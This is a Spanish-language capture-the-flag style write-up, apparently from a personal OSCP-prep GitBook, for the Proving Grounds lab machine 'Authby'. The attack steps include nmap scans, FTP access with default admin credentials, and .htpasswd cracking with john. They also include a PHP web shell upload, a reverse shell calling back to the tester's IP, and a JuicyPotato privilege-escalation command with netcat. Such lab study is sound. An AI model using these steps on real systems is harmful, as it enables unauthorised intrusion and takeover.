1gnotus
  • WHOAMI
    • Mi camino a la OSCP😘
    • Mi primer Certificación la eJPT
  • HACK THE BOX
    • Page 1
    • Page 2
  • 💻Proving Ground Practice and Play
    • Writeup
      • MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env')
      • MAQUINA ALGERNON (VULn 'smartermail v6985 RCE')
      • MAQUINA TWIGGY (CMS MEZZANINA RCE VULN ZEROMQ ZMTP o API SALTSTACK 3000.1 'cve 2020 11651')
      • MAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA an
      • MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP
      • MAQUINA CLAMV (VULN SMTP 25 'clamv' Sendmail 8.13 SEARCHSPLOIT)
      • MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +
      • MAQUINA CODO (CODOFORUM 5.1 'RCE + UPLOAD IMG.' + LINPEAS)
      • MAQUINA CVE-2023-40582 (Vulnerabilidad de Inyección de Comando en find exec)
      • MAQUINA CVE-2023-46818 (RCE CVE 2023 46818 ispconfig.)
      • MAQUINA DC 2 (Enum Users Wordpress WPSCAN + CEWL wordlists + BruteForce WPSCAN + PRIVESC bin git 'je
      • MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
      • MAQUINA ELECTION1 (Sito web Election 2.0 + PHPmyadmin login + Escalate Priv SERV U)
      • MAQUINA DVR4 (web 'Argus Surveillance DVR version 4.0.0.0' + Vuln 'Argus Surveillance DVR DIRECTORY
      • MAQUINA EXFILTRED Subrion CMS v4.2.1 File Upload Bypass to RCE (Authenticated) UPLOAD PHAR 'CMD' PRI
      • MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')
      • MAQUINA FANTASTIC (GRAFANA 8.3 'vuln lfi' + PROMETHEUS 2.32 + ESCALATE PRIV 'group DISK = root + ID_
      • MAQUINA FUNYBOX (CSE BOOKSTORE 1.0 Vuln rce no autenticado PRIVESC pkexec 'sudo l' extra bypass login SMALL CRM ADMIN 3.0)
      • MAQUINA INTERNAL (WINDOWS SERVER 2008 + CVE 2009 3103 + METERPRETER RCE)
      • MAQUINA HUB ( Enum web port 8082 + FUGUHUB + injeccion revershell en LUA)
      • MAQUINA KEVIN (VULN HP POWER MANAGER 'admin admin' Metasploit PrivEsc 'hp manager filename' Metasploit BufferOverflow 'MANUAL')
      • MAQUINA LEVRAM (Exploit GERAPY 0.9.6 RCE searchsploit + PRIVESC 'CAPABILITES python3.10')
      • MAQUINA MEDJED (WEBDAV BarracudaDrive 6.5 + Revershell .php creado con msfvenom + PrivEsc local barracudadrive 6.5)
      • MAQUINA NUKEM (WORDPRESS 5.5.1 ABUSED PLUGINS SIMPLE LIST 4.4.2 PIVOTING USER MYSQL PASSOWORD PIVOTING PUERTO Y TUNELIZACION SSH PRIVESC 'DOSBOX' CAMBIO DE PERMISOS SUDOERS CON REMMINA)
      • MAQUINA PASS (FlatPass 1.2 Vuln 'file upload bypass RCE' Privesc 'apt get')
      • MAQUINA PELICAN (RCE ZooKeeper v1 Web UI + RCE + PrivEsc 'gcore pid + extract password 'strings' = root)
      • MAQUINA RAY PROJECT CVE 2023 6019 (COMMANDO INJECTION RAY PROJECT)
      • MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC
      • MAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)
      • MAQUINA SQUID (web proxy SQUID 4.14 + 'RCE UPLOAD script' PHPMYADMIN 5.0.2)
      • MAQUINA PC (PortForwarding port 65432 - PrivEsc 0-day 2022 rpc.py)
      • MAQUINA FUNBOXEASY (Enum directory - RCE .php - Pivoting User - PrivEsc SUDO-L)
      • MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)
      • MAQUINA PASSPORT (Enum Directorios ss2john id rsa PrivEsc Creacion de archivo con permisos SUID)
      • MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)
      • MAQUINA HUTCH (Netexec LDAP enum - PrivEsc Netexec DUMP Laps)
      • MAQUINA GAARA (Brute Force SSH PrivEsc 'gdb' gtfobins)
  • 🥸CHEET-SEET
    • CheetSeet WPSCAN
  • 🐋DOCKERLABS
    • Writeup
      • MAQUINA WALKINGCMS
      • MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')
      • MAQUINA DANCE SAMBA (Enum4linux Smbclient ssh keygen id_rsa PrivEsc file})
      • MAQUINA DANCE SAMBA (Enum4linux Smbclient ssh keygen id_rsa PrivEsc file})
      • MAQUINA PYSCHO (Fuzzing Parametros VULN WEB LFI con FUZZ Pivoting User PrivEsc {python3 paw.py})
  • 👺Road-to-BSCP
    • Page 4
  • 🖥️THEHACKLABS
    • Writeups
      • MAQUINA TORRIJAS(CMS WORDPRESS 6.7.2, WPSCAN PLUGINS 'WP DIRECTORY FREE 1.7.9 LocalFileInclusion PRIVESC bpftrace)
      • MAQUINA FACULTAD (Enum WPSCAN - wordpress UPLOAD RCE WP-FILE-MANAGER - PrivEsc SUDO -L RCE)
      • MAQUINA FRUITS (FUZZING de parámetros LFI BRUTEFORCE password PRIVESC binario FIND)
Powered by GitBook
On this page
  1. Proving Ground Practice and Play
  2. Writeup

MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP

PreviousMAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA anNextMAQUINA CLAMV (VULN SMTP 25 'clamv' Sendmail 8.13 SEARCHSPLOIT)

Last updated 2 months ago

Escaneo de puertos

nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn 192.168.156.45 -oG basicscan.txt

Puertos abiertos 21;242;3145;3389 >> Realizo un escaneo de servicios y versiones.

nmap -p21,242,3145,3389 -sCV 192.168.156.45 -oN fullscan.txt

Reconocimiento de FTP ya que tengo acceso como anonymous pero al ver las carpetas solo esta autorizado por el usuario root a realizar cambios.

ftp 192.168.156.45 >> acceso anonymous pero denegado la descarga de archivos

Examino la web que esta corriendo en el puerto 242 (apache). Una vez dentro me solicita unas credenciales que no tengo.

El puerto 3145 corre un servicio llamado "zftpserver".

Como le da soporte al FTP y tengo este servicio abierto, busque si existen credenciales para acceder al servicio FTP.

Google me identifico 4 variasntes de posibles credenciales, por lo que paso a probarlas en el servicio FTP.

ftp 192.168.156.46

User: admin>> OK

password: admin >> OK

Al primer intento tengo acceso al FTP como admin!, este contiene otros archivos que me los descargo en mi maquina atacante.

get .htaccess (lo mismo con los de mas)

Leo el contenido y observo unas credenciales. Al tener esto modifico el archivo transformándolo en un archivo.txt (de texto) para poder crear el hash con john the ripper.

1: mv .htpasswd cred.txt

2: john --wordlist=/usr/share/wordlists/rockyou.txt cred.txt 3: hash decifrado

Ya tengo la contraseña en texto plano= offsec:elite. Al ver el index.php observe que es dice lo mismo que el informe de nmap.

Así que por ende estas serian credenciales del sitio web, así que las coloco y estoy dentro del mismo.

Como se que el ftp aloja archivos en el servidor web (INDEX.PHP) voy a subir un archivo en PHP.

Ya creado y subido el archivo.php voy a la URL y le agrego el nombre de mi archivo > ? > cmd=whoami.. Esto me devuelve en la web quienes somos o quien ejecuta el sitio.

Como puedo ejecutar comandos y subir archivos, lo que realice es la subida de un revershell.

https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/README.md

Descargo el script y luego veo su código para realizar unas modificaciones.

Modificar la IP: 192.168.45.233

ARCHIVO SHELL.PHP:

Una vez realizado estos cambio, en una terminal me pongo a la escucha con netcat, y luego ejecuto en la web la shell.

Ya recibí la shell, ahora a realizar un reconocimiento:

Veo que tengo privilegios de SeImpersonatePrivilege por ende puedo algunas funciones para realizar la escala de privilegios.

Como es de arquitectura x86 busco el juicypotatox86, una vez descargado esto, descargo varios exploit de Windows.

MAS INFO:

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterp

Para realizar con éxito la escala de privilegios lo que hago es abusar de los CLSID "{9B1F122C- 2982-4e91-AA8B-E071D54F2A4D}"

Subo a la maquina los archivos EL JUICTPOTATO X 86 Y EL NETCAT X86 o 32.

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.ex

Antes de ejecutar el script me pongo en escucha con netcat a traves del puerto seleccionado y ejecuto el script.

Ahora tengo todos los privilegios de la maquina.

Modificar la ruta en donde estamos: en este caso C:

💻
\wampp\www.